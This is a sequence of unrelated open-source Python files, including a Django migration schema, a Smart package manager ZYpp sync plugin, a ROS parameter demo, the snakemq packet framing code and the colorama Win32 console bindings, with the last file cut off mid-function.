'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255', 'db_index': 'True'}),
'url': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True'})
},
'im.emailchange': {
'Meta': {'object_name': 'EmailChange'},
'activation_key': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '40', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'new_email_address': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'requested_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'emailchanges'", 'unique': 'True', 'to': "orm['im.AstakosUser']"})
},
'im.endpoint': {
'Meta': {'object_name': 'Endpoint'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'service': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'endpoints'", 'to': "orm['im.Service']"})
},
'im.endpointdata': {
'Meta': {'unique_together': "(('endpoint', 'key'),)", 'object_name': 'EndpointData'},
'endpoint': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'data'", 'to': "orm['im.Endpoint']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '1024'})
},
'im.invitation': {
'Meta': {'object_name': 'Invitation'},
'code': ('django.db.models.fields.BigIntegerField', [], {'db_index': 'True'}),
'consumed': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'inviter': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'invitations_sent'", 'null': 'True', 'to': "orm['im.AstakosUser']"}),
'is_consumed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'realname': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'})
},
'im.pendingthirdpartyuser': {
'Meta': {'unique_together': "(('provider', 'third_party_identifier'),)", 'object_name': 'PendingThirdPartyUser'},
'affiliation': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'null': 'True', 'blank': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'null': 'True', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'info': ('django.db.models.fields.TextField', [], {'default': "''", 'null': 'True', 'blank': 'True'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'null': 'True', 'blank': 'True'}),
'provider': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'third_party_identifier': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'token': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'im.project': {
'Meta': {'object_name': 'Project'},
'application': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'project'", 'unique': 'True', 'to': "orm['im.ProjectApplication']"}),
'creation_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'deactivation_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'deactivation_reason': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'id': ('django.db.models.fields.BigIntegerField', [], {'primary_key': 'True', 'db_column': "'id'"}),
'last_approval_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'members': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['im.AstakosUser']", 'through': "orm['im.ProjectMembership']", 'symmetrical': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '80', 'unique': 'True', 'null': 'True', 'db_index': 'True'}),
'state': ('django.db.models.fields.IntegerField', [], {'default': '1', 'db_index': 'True'})
},
'im.projectapplication': {
'Meta': {'unique_together': "(('chain', 'id'),)", 'object_name': 'ProjectApplication'},
'applicant': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'projects_applied'", 'to': "orm['im.AstakosUser']"}),
'chain': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'chained_apps'", 'db_column': "'chain'", 'to': "orm['im.Project']"}),
'comments': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'end_date': ('django.db.models.fields.DateTimeField', [], {}),
'homepage': ('django.db.models.fields.URLField', [], {'max_length': '255', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'issue_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'limit_on_members_number': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True'}),
'member_join_policy': ('django.db.models.fields.IntegerField', [], {}),
'member_leave_policy': ('django.db.models.fields.IntegerField', [], {}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '80'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'projects_owned'", 'to': "orm['im.AstakosUser']"}),
'resource_grants': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['im.Resource']", 'null': 'True', 'through': "orm['im.ProjectResourceGrant']", 'blank': 'True'}),
'response': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'response_actor': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'responded_apps'", 'null': 'True', 'to': "orm['im.AstakosUser']"}),
'response_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'start_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'state': ('django.db.models.fields.IntegerField', [], {'default': '0', 'db_index': 'True'}),
'waive_actor': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'waived_apps'", 'null': 'True', 'to': "orm['im.AstakosUser']"}),
'waive_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'waive_reason': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'})
},
'im.projectlog': {
'Meta': {'object_name': 'ProjectLog'},
'actor': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['im.AstakosUser']", 'null': 'True'}),
'comments': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'date': ('django.db.models.fields.DateTimeField', [], {}),
'from_state': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'log'", 'to': "orm['im.Project']"}),
'reason': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'to_state': ('django.db.models.fields.IntegerField', [], {})
},
'im.projectmembership': {
'Meta': {'unique_together': "(('person', 'project'),)", 'object_name': 'ProjectMembership'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'person': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['im.AstakosUser']"}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['im.Project']"}),
'state': ('django.db.models.fields.IntegerField', [], {'default': '0', 'db_index': 'True'})
},
'im.projectmembershiplog': {
'Meta': {'object_name': 'ProjectMembershipLog'},
'actor': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['im.AstakosUser']", 'null': 'True'}),
'comments': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'date': ('django.db.models.fields.DateTimeField', [], {}),
'from_state': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'membership': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'log'", 'to': "orm['im.ProjectMembership']"}),
'reason': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'to_state': ('django.db.models.fields.IntegerField', [], {})
},
'im.projectresourcegrant': {
'Meta': {'unique_together': "(('resource', 'project_application'),)", 'object_name': 'ProjectResourceGrant'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'member_capacity': ('snf_django.lib.db.fields.IntDecimalField', [], {'default': '0', 'max_digits': '38', 'decimal_places': '0'}),
'project_application': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['im.ProjectApplication']", 'null': 'True'}),
'project_capacity': ('snf_django.lib.db.fields.IntDecimalField', [], {'null': 'True', 'max_digits': '38', 'decimal_places': '0'}),
'resource': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['im.Resource']"})
},
'im.resource': {
'Meta': {'object_name': 'Resource'},
'allow_in_projects': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'desc': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'service_origin': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'service_type': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'unit': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'uplimit': ('snf_django.lib.db.fields.IntDecimalField', [], {'default': '0', 'max_digits': '38', 'decimal_places': '0'})
},
'im.serial': {
'Meta': {'object_name': 'Serial'},
'serial': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'im.service': {
'Meta': {'object_name': 'Service'},
'component': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['im.Component']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'im.sessioncatalog': {
'Meta': {'object_name': 'SessionCatalog'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'session_key': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'sessions'", 'null': 'True', 'to': "orm['im.AstakosUser']"})
},
'im.usersetting': {
'Meta': {'unique_together': "(('user', 'setting'),)", 'object_name': 'UserSetting'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'setting': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['im.AstakosUser']"}),
'value': ('django.db.models.fields.IntegerField', [], {})
}
}
complete_apps = ['im']
|
64studio/smart | refs/heads/master | smart/plugins/zyppchannelsync.py | 3 | #
# Written by Jonathan Rocker <linux.learner@gmail.com>
# and Anders F Bjorklund <afb@users.sourceforge.net>
#
# This file is part of Smart Package Manager.
#
# Smart Package Manager is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as published
# by the Free Software Foundation; either version 2 of the License, or (at
# your option) any later version.
#
# Smart Package Manager is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Smart Package Manager; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
import posixpath
import os
import ConfigParser
import re
# be compatible with 2.3
import sys
if sys.version_info < (2, 4):
from sets import Set as set
from smart.channel import *
from smart import *
ZYPP_REPOS_DIR = "/etc/zypp/repos.d/"
def _getbasearch():
"""
Get system architecture (like libzypp's ZConfig does it)
"""
import platform
architecture = platform.machine()
if architecture == '':
return "noarch"
# some CPUs report i686 but dont implement cx8 and cmov
# check for both flags in /proc/cpuinfo and downgrade
# to i586 if either is missing (cf opensuse bug #18885)
if architecture == "i686":
if os.path.exists("/proc/cpuinfo"):
cpuinfo = open("/proc/cpuinfo", "r")
for line in cpuinfo.readlines():
if line.startswith("flags"):
if line.find("cx8") == -1 or line.find("cmov") == -1:
architecture = "i586"
return architecture
def _getreleasever():
"""
Get system release and version.
"""
try:
import rpm
except ImportError:
return None
releasever = None
rpmroot = sysconf.get("rpm-root", "/")
ts = rpm.TransactionSet(rpmroot)
if ts.openDB() == 0:
idx = ts.dbMatch('provides', 'openSUSE-release')
if idx.count() == 0:
idx = ts.dbMatch('provides', 'distribution-release')
if idx.count() != 0:
hdr = idx.next()
releasever = str(hdr['version'])
del hdr
del idx
del ts
return releasever
BASEARCH = _getbasearch()
RELEASEVER = _getreleasever()
def _replaceStrings(txt):
"""
Replace some predefined strings that may appear in the repo file.
"""
retxt = re.sub("\$basearch", "%s" % BASEARCH, txt)
retxt = re.sub("\$releasever", "%s" % RELEASEVER, retxt)
return retxt
def _findBaseUrl(mirrorlist, repo):
"""
Fetches the first suggested mirror from the mirrorlist and use as baseurl.
"""
import urllib
list = urllib.urlopen(mirrorlist)
baseurl = None
while 1:
line = list.readline()
if line.startswith("#"):
continue
elif (line.startswith("http:") or line.startswith("https:") or
line.startswith("ftp:") or line.startswith("file:")):
baseurl = line
break
elif not line:
break
return baseurl
def _loadRepoFile(filename):
"""
Loads each repository file information.
"""
file = open(filename)
# The computed aliases we have seen in the given file
seen = set()
repofile = ConfigParser.ConfigParser()
repofile.read(filename)
for repo in repofile.sections():
# Iterate through each repo found in file
alias = "zyppsync-%s" % repo
name = _replaceStrings(repofile.get(repo, 'name'))
baseurl = None
mirrorlist = None
# Some repos have baseurl, some have mirrorlist
if repofile.has_option(repo, 'baseurl'):
baseurl = _replaceStrings(repofile.get(repo, 'baseurl'))
#baseurl = baseurl.splitlines()[1]
elif repofile.has_option(repo, 'mirrorlist'):
mirrorlist = _replaceStrings(repofile.get(repo, 'mirrorlist'))
baseurl = _findBaseUrl(mirrorlist, repo)
else:
iface.warning(_("ZYpp channel %s does not contain baseurl or " \
"mirrorlist addresses. Not syncing.") % repo)
return seen
if repofile.has_option(repo, 'enabled'):
enabled = not repofile.getboolean(repo, 'enabled')
else:
enabled = False
if repofile.has_option(repo, 'type'):
type = repofile.get(repo, 'type')
if type == "NONE": type = "rpm-md"
else:
type = "rpm-md"
if baseurl.startswith("cd://"):
baseurl = "localmedia://" + baseurl[6:]
if baseurl.find("?devices=") > -1:
baseurl = baseurl.split("?")[0]
data = {"type": type,
"name": name,
"baseurl": baseurl,
"disabled": enabled}
if mirrorlist:
data["mirrorlist"] = mirrorlist
seen.add(alias)
try:
createChannel(alias, data)
except Error, e:
iface.error(_("While using %s: %s") % (filename, e))
else:
# Store it persistently.
sysconf.set(("channels", alias), data)
return seen
def syncZyppRepos(reposdir, force=None):
"""
Sync Smart channels based on ZYpp repositories.
"""
seen = set()
if os.path.isdir(reposdir):
for entry in os.listdir(reposdir):
if entry.endswith(".repo"):
filepath = os.path.join(reposdir, entry)
if os.path.isfile(filepath):
seen.update(_loadRepoFile(filepath))
# Delete the entries which were not seen in current files.
channels = sysconf.get("channels")
for alias in sysconf.keys("channels"):
if alias.startswith("zyppsync-") and alias not in seen:
sysconf.remove(("channels", alias))
if not sysconf.getReadOnly():
if sysconf.get("sync-zypp-repos",False):
syncZyppRepos(sysconf.get("zypp-repos-dir", ZYPP_REPOS_DIR))
# vim:ts=4:sw=4:et
|
anhstudios/swganh | refs/heads/develop | data/scripts/templates/object/tangible/furniture/jedi/shared_frn_all_light_chair_s02.py | 2 | #### NOTICE: THIS FILE IS AUTOGENERATED
#### MODIFICATIONS MAY BE LOST IF DONE IMPROPERLY
#### PLEASE SEE THE ONLINE DOCUMENTATION FOR EXAMPLES
from swgpy.object import *
def create(kernel):
result = Tangible()
result.template = "object/tangible/furniture/jedi/shared_frn_all_light_chair_s02.iff"
result.attribute_template_id = 6
result.stfName("frn_n","frn_jedi_chair")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
return result |
bandi13/cs980-ROS-bot | refs/heads/master | ROS_ws/src/eyes/006_parameters/param_talker.py | 1 | #!/usr/bin/env python
# Software License Agreement (BSD License)
#
# Copyright (c) 2008, Willow Garage, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Willow Garage, Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# Revision $Id: listener.py 5263 2009-07-17 23:30:38Z sfkwc $
## Simple talker demo that listens to std_msgs/Strings published
## to the 'chatter' topic
import rospy
from std_msgs.msg import String
def param_talker():
rospy.init_node('param_talker')
# Fetch values from the Parameter Server. In this example, we fetch
# parameters from three different namespaces:
#
# 1) global (/global_example)
# 2) parent (/foo/utterance)
# 3) private (/foo/param_talker/topic_name)
# fetch a /global parameter
global_example = rospy.get_param("/global_example")
rospy.loginfo("%s is %s", rospy.resolve_name('/global_example'), global_example)
# fetch the utterance parameter from our parent namespace
utterance = rospy.get_param('utterance')
rospy.loginfo("%s is %s", rospy.resolve_name('utterance'), utterance)
# fetch topic_name from the ~private namespace
topic_name = rospy.get_param('~topic_name')
rospy.loginfo("%s is %s", rospy.resolve_name('~topic_name'), topic_name)
# fetch a parameter, using 'default_value' if it doesn't exist
default_param = rospy.get_param('default_param', 'default_value')
rospy.loginfo('%s is %s', rospy.resolve_name('default_param'), default_param)
# fetch a group (dictionary) of parameters
gains = rospy.get_param('gains')
p, i, d = gains['P'], gains['I'], gains['D']
rospy.loginfo("gains are %s, %s, %s", p, i, d)
# set some parameters
rospy.loginfo('setting parameters...')
rospy.set_param('list_of_floats', [1., 2., 3., 4.])
rospy.set_param('bool_True', True)
rospy.set_param('~private_bar', 1+2)
rospy.set_param('to_delete', 'baz')
rospy.loginfo('...parameters have been set')
# delete a parameter
if rospy.has_param('to_delete'):
rospy.delete_param('to_delete')
rospy.loginfo("deleted %s parameter"%rospy.resolve_name('to_delete'))
else:
rospy.loginfo('parameter %s was already deleted'%rospy.resolve_name('to_delete'))
# search for a parameter
param_name = rospy.search_param('global_example')
rospy.loginfo('found global_example parameter under key: %s'%param_name)
# publish the value of utterance repeatedly
pub = rospy.Publisher(topic_name, String, queue_size=10)
while not rospy.is_shutdown():
pub.publish(utterance)
rospy.loginfo(utterance)
rospy.sleep(1)
if __name__ == '__main__':
try:
param_talker()
except rospy.ROSInterruptException: pass
|
kno10/WikipediaEntities | refs/heads/master | subset-recommended.py | 1 | #!/usr/bin/python
import gzip, re, sys
# Minimum phrase length (characters)
minlen = 3
# Minimum number of occurrences
mincount = 50
# Minimum trust value
mintrust = 90
mintrustexact = 80
# Results with exact matches only
exactonly = True
# Minimum contrast, i.e. second may have at most trust < besttrust-mincontrast
mincontrast = 20
# Match the percentage at the end only:
pat = re.compile(r"^(.*?):[0-9:]+:([0-9]+):([0-9]+)%$")
# Output to stdout:
ou = sys.stdout
for line in gzip.open("entities.gz"):
line = line.split("\t")
phrase, count, used = line[0], line[1], line[2]
if used < mincount: continue
if len(phrase) < minlen: continue
m = pat.match(line[3])
if not m:
print >>sys.stderr, "Did not match:", line
continue
trust = float(m.group(3))
isexact = not (m.group(2) == '0')
if isexact:
if trust < mintrustexact: continue
else:
if trust < mintrust: continue
if exactonly and not isexact: continue
if len(line) > 4:
m2 = pat.match(line[4])
if not m2:
print >>sys.stderr, "Did not match:", line
continue
trust2 = float(m2.group(3))
if trust2 >= trust - mincontrast:
continue
ou.write(phrase)
ou.write("\t")
ou.write(m.group(1))
ou.write("\n")
|
golismero/golismero | refs/heads/master | thirdparty_libs/snakemq/packeter.py | 9 | # -*- coding: utf-8 -*-
"""
Packet format: ``[4B size|payload]``, size is bytes count (unsigned integer in
network order) of all following packet data.
:author: David Siroky (siroky@dasir.cz)
:license: MIT License (see LICENSE.txt or
U{http://www.opensource.org/licenses/mit-license.php})
"""
import logging
import struct
from collections import deque
from snakemq.exceptions import NoConnection
from snakemq.buffers import StreamBuffer
from snakemq.exceptions import SnakeMQBrokenPacket
from snakemq.callbacks import Callback
############################################################################
############################################################################
SEND_BLOCK_SIZE = 64 * 1024
BIN_SIZE_FORMAT = "!I" # network order 32-bit unsigned integer
SIZEOF_BIN_SIZE = struct.calcsize(BIN_SIZE_FORMAT)
############################################################################
############################################################################
def size_to_bin(size):
# make the size a signed integer - negative integers might be
# reserved for future extensions
return struct.pack(BIN_SIZE_FORMAT, size)
#################################################################
def bin_to_size(buf):
return struct.unpack(BIN_SIZE_FORMAT, buf)[0]
############################################################################
############################################################################
class ReceiveBuffer(StreamBuffer):
def __init__(self):
StreamBuffer.__init__(self)
self.packet_size = None # cache for packet size by its header
############################################################
def get_packets(self):
"""
:return: list of fully received packets
"""
packets = []
while self.size:
if self.packet_size is None:
if self.size < SIZEOF_BIN_SIZE:
# wait for more data
break
header = self.get(SIZEOF_BIN_SIZE, True)
self.packet_size = bin_to_size(header)
if self.packet_size < 0:
raise SnakeMQBrokenPacket("wrong packet header")
else:
if self.size < self.packet_size:
# wait for more data
break
packets.append(self.get(self.packet_size, True))
self.packet_size = None
return packets
############################################################################
############################################################################
class ConnectionInfo(object):
"""
Connection information and receive buffer handler.
"""
def __init__(self):
self.send_buffer = StreamBuffer()
self.recv_buffer = ReceiveBuffer()
self.send_in_progress = False
self.queued_packet_ids = deque() # pairs of (packet_length, packet_id)
############################################################################
############################################################################
class Packeter(object):
def __init__(self, link):
"""
:param link: :class:`~snakemq.link.Link`
"""
self.link = link
self.log = logging.getLogger("snakemq.packeter")
#{ callbacks
self.on_connect = Callback() #: ``func(conn_id)``
self.on_disconnect = Callback() #: ``func(conn_id)``
self.on_packet_recv = Callback() #: ``func(conn_id, packet)``
#: ``func(conn_id, packet_id)``, just a signal when a packet was fully sent
self.on_packet_sent = Callback()
self.on_error = Callback() #: ``func(conn_id, exception)``
#}
self._connections = {} # conn_id:ConnectionInfo
self._last_packet_id = 0
self.link.on_connect.add(self._on_connect)
self.link.on_disconnect.add(self._on_disconnect)
self.link.on_recv.add(self._on_recv)
self.link.on_ready_to_send.add(self._on_ready_to_send)
###########################################################
###########################################################
def send_packet(self, conn_id, buf):
"""
Queue data to be sent over the link.
:return: packet id
"""
assert type(buf) == bytes
try:
conn = self._connections[conn_id]
except KeyError:
raise NoConnection
self._last_packet_id += 1
packet_id = self._last_packet_id
buf = size_to_bin(len(buf)) + buf
conn.send_buffer.put(buf)
conn.queued_packet_ids.append((len(buf), packet_id))
self._send_to_link(conn_id, conn)
return packet_id
###########################################################
###########################################################
def _on_connect(self, conn_id):
self._connections[conn_id] = ConnectionInfo()
self.on_connect(conn_id)
###########################################################
def _on_disconnect(self, conn_id):
# TODO signal unsent data and unreceived data
del self._connections[conn_id]
self.on_disconnect(conn_id)
###########################################################
def _on_recv(self, conn_id, buf):
recv_buffer = self._connections[conn_id].recv_buffer
recv_buffer.put(buf)
try:
packets = recv_buffer.get_packets()
except SnakeMQBrokenPacket as exc:
self.log.error("conn=%s %r" % (conn_id, exc))
self.on_error(conn_id, exc)
self.link.close(conn_id)
return
for packet in packets:
self.log.debug("recv packet %s len=%i" % (conn_id, len(packet)))
self.on_packet_recv(conn_id, packet)
###########################################################
def _on_ready_to_send(self, conn_id, sent_length):
conn = self._connections[conn_id]
conn.send_in_progress = False
conn.send_buffer.cut(sent_length)
while sent_length > 0:
first, packet_id = conn.queued_packet_ids.popleft()
if first <= sent_length:
self.on_packet_sent(conn_id, packet_id)
else:
conn.queued_packet_ids.appendleft((first - sent_length,
packet_id))
sent_length -= first
self._send_to_link(conn_id, conn)
###########################################################
def _send_to_link(self, conn_id, conn):
if conn.send_in_progress:
return
buf = conn.send_buffer.get(SEND_BLOCK_SIZE, False)
if buf:
self.link.send(conn_id, buf)
conn.send_in_progress = True
|
ak2703/edx-platform | refs/heads/master | common/lib/xmodule/xmodule/errortracker.py | 177 | import logging
import sys
import traceback
from collections import namedtuple
log = logging.getLogger(__name__)
ErrorLog = namedtuple('ErrorLog', 'tracker errors')
def exc_info_to_str(exc_info):
"""Given some exception info, convert it into a string using
the traceback.format_exception() function.
"""
return ''.join(traceback.format_exception(*exc_info))
def in_exception_handler():
'''Is there an active exception?'''
return sys.exc_info() != (None, None, None)
def make_error_tracker():
'''Return an ErrorLog (named tuple), with fields (tracker, errors), where
the logger appends a tuple (message, exception_str) to the errors on every
call. exception_str is in the format returned by traceback.format_exception.
error_list is a simple list. If the caller modifies it, info
will be lost.
'''
errors = []
def error_tracker(msg):
'''Log errors'''
exc_str = ''
if in_exception_handler():
exc_str = exc_info_to_str(sys.exc_info())
# don't display irrelevant gunicorn sync error
if (('python2.7/site-packages/gunicorn/workers/sync.py' in exc_str) and
('[Errno 11] Resource temporarily unavailable' in exc_str)):
exc_str = ''
errors.append((msg, exc_str))
return ErrorLog(error_tracker, errors)
def null_error_tracker(msg):
'''A dummy error tracker that just ignores the messages'''
pass
|
mpercich/Calendarize | refs/heads/master | ios/dateparser/lib/python2.7/site-packages/pip/_vendor/colorama/win32.py | 535 | # Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file.
# from winbase.h
STDOUT = -11
STDERR = -12
try:
import ctypes
from ctypes import LibraryLoader
windll = LibraryLoader(ctypes.WinDLL)
from ctypes import wintypes
except (AttributeError, ImportError):
windll = None
SetConsoleTextAttribute = lambda *_: None
winapi_test = lambda *_: None
else:
from ctypes import byref, Structure, c_char, POINTER
COORD = wintypes._COORD
class CONSOLE_SCREEN_BUFFER_INFO(Structure):
"""struct in wincon.h."""
_fields_ = [
("dwSize", COORD),
("dwCursorPosition", COORD),
("wAttributes", wintypes.WORD),
("srWindow", wintypes.SMALL_RECT),
("dwMaximumWindowSize", COORD),
]
def __str__(self):
return '(%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d)' % (
self.dwSize.Y, self.dwSize.X
, self.dwCursorPosition.Y, self.dwCursorPosition.X
, self.wAttributes
, self.srWindow.Top, self.srWindow.Left, self.srWindow.Bottom, self.srWindow.Right
, self.dwMaximumWindowSize.Y, self.dwMaximumWindowSize.X
)
_GetStdHandle = windll.kernel32.GetStdHandle
_GetStdHandle.argtypes = [
wintypes.DWORD,
]
_GetStdHandle.restype = wintypes.HANDLE
_GetConsoleScreenBufferInfo = windll.kernel32.GetConsoleScreenBufferInfo
_GetConsoleScreenBufferInfo.argtypes = [
wintypes.HANDLE,
POINTER(CONSOLE_SCREEN_BUFFER_INFO),
]
_GetConsoleScreenBufferInfo.restype = wintypes.BOOL
_SetConsoleTextAttribute = windll.kernel32.SetConsoleTextAttribute
_SetConsoleTextAttribute.argtypes = [
wintypes.HANDLE,
wintypes.WORD,
]
_SetConsoleTextAttribute.restype = wintypes.BOOL
_SetConsoleCursorPosition = windll.kernel32.SetConsoleCursorPosition
_SetConsoleCursorPosition.argtypes = [
wintypes.HANDLE,
COORD,
]
_SetConsoleCursorPosition.restype = wintypes.BOOL
_FillConsoleOutputCharacterA = windll.kernel32.FillConsoleOutputCharacterA
_FillConsoleOutputCharacterA.argtypes = [
wintypes.HANDLE,
c_char,
wintypes.DWORD,
COORD,
POINTER(wintypes.DWORD),
]
_FillConsoleOutputCharacterA.restype = wintypes.BOOL
_FillConsoleOutputAttribute = windll.kernel32.FillConsoleOutputAttribute
_FillConsoleOutputAttribute.argtypes = [
wintypes.HANDLE,
wintypes.WORD,
wintypes.DWORD,
COORD,
POINTER(wintypes.DWORD),
]
_FillConsoleOutputAttribute.restype = wintypes.BOOL
_SetConsoleTitleW = windll.kernel32.SetConsoleTitleA
_SetConsoleTitleW.argtypes = [
wintypes.LPCSTR
]
_SetConsoleTitleW.restype = wintypes.BOOL
handles = {
STDOUT: _GetStdHandle(STDOUT),
STDERR: _GetStdHandle(STDERR),
}
def winapi_test():
handle = handles[STDOUT]
csbi = CONSOLE_SCREEN_BUFFER_INFO()
success = _GetConsoleScreenBufferInfo(
handle, byref(csbi))
return bool(success)
def GetConsoleScreenBufferInfo(stream_id=STDOUT):
handle = handles[stream_id]
csbi = CONSOLE_SCREEN_BUFFER_INFO()
success = _GetConsoleScreenBufferInfo(
handle, byref(csbi))
return csbi
def SetConsoleTextAttribute(stream_id, attrs):
handle = handles[stream_id]
